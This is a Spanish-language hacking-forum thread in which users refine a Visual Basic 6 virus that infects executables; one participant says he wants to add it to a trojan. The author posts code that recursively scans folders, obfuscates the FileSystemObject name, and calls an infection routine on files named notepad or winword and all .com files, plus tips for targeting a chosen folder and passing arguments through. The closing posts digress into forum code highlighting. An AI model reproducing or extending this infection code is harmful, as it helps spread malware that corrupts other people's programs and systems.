[Source] Infección de ejecutables en VB6

Iniciado por Mad Antrax, 4 Abril 2007, 23:02 PM

0 Miembros y 1 Visitante están viendo este tema.

nhaalclkiemr

Hola, este codigo está muy bien, pero digo en varias cosas que podría mejorar y que estarían muy bien:

-Que los parametros se pasen también al archivo infectado, pues si ejecutas por ejemplo ping 127.0.0.1 -n1 y el archivo ping.exe está infectado se ejecutaría simplemente ping

-Que sea el virus el que se descomprime en la ruta temporal y no el programa original, pues en caso de que por ejemplo un programa buscase los archivos que necesita para funcionar en su mismo directorio al estar en temp no los encontraría.

Después me gustaría saber como se podría hacer esto:

-Que no infecte a una carpeta (subcarpetas y archivos  :xD) determinada o que solo infecte a una determinada
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Es que me gustaría añadir esto a un troyano y weno, me gustaría saber como podría hacer esto.

Saludos ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

Mad Antrax

Cita de: nhaalclkiemr en 11 Julio 2007, 20:43 PM
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Aqui tienes para lo del nombre:

Código (vb) [Seleccionar]
Function Subfolders(path)
    On Error Resume Next
    'Se cifra el string que carga el objeto Scripting.FileSystemObject
    Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
    Set Drives = fso.Drives

    newpath = path
    Set Fold = fso.GetFolder(newpath)
    Set Files = Fold.Files

    For Each File In Files
        ext = fso.GetExtensionName(File.path)
        ext = LCase(ext)
        nam = LCase(File.Name)
        'Modificación del Source
        If (nam = "notepad") OR (nam = "winword") OR (ext = "com") Then
            If IsInfected(File.path) = False Then
                InfectFile (File.path)
                DoEvents
            End If
        End If
    Next

    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next
End Function

Este ejemplo infecta cualquier archivo llamado notepad.* y winword.* Además infectará todos los archivo con extensión *.com

Citar-Que no infecte a una carpeta (subcarpetas y archivos  :xD) determinada o que solo infecte a una determinada
Este es más complicado, pero creo que debería suprimir la parte del final:

Código (vb) [Seleccionar]
    Set File = Fold.Subfolders
    For Each Subfol In File
        Call Subfolders(Subfol.path)
    Next


Y llamar a la función: Subfolders con la ruta exacta, ejemplo: Subfolders("C:\Windows\System32)"
Ojo que esto último no lo he probado
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

nhaalclkiemr

Gracias, cuando pueda ya pruevo. Y encontraste alguna manera de como pasar los parametros al programa original. Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Sludos y gracias por todo ;)
StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%

Mad Antrax

Cita de: nhaalclkiemr en 11 Julio 2007, 21:34 PM
Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Existe una variable de VB6 llamada:

Código (vb) [Seleccionar]
Parametros = Command$

Esto te devuelve los parametros con el que se ha ejecutado tu aplicación, con eso tienes suficiente. Saludos!!
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Freeze.

||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Mad Antrax

Cita de: -Freeze- en 11 Julio 2007, 22:35 PM
||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Instalado Mod para Programación/Programadores GeSHi
https://foro.elhacker.net/index.php/topic,170103.0.html
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

Freeze.


Freeze.

Disculpen el 2ble post.:
y Tambien disculpen desviar el hilo...

¿Como se usa?

Código (perl) [Seleccionar]
asii??

no no se...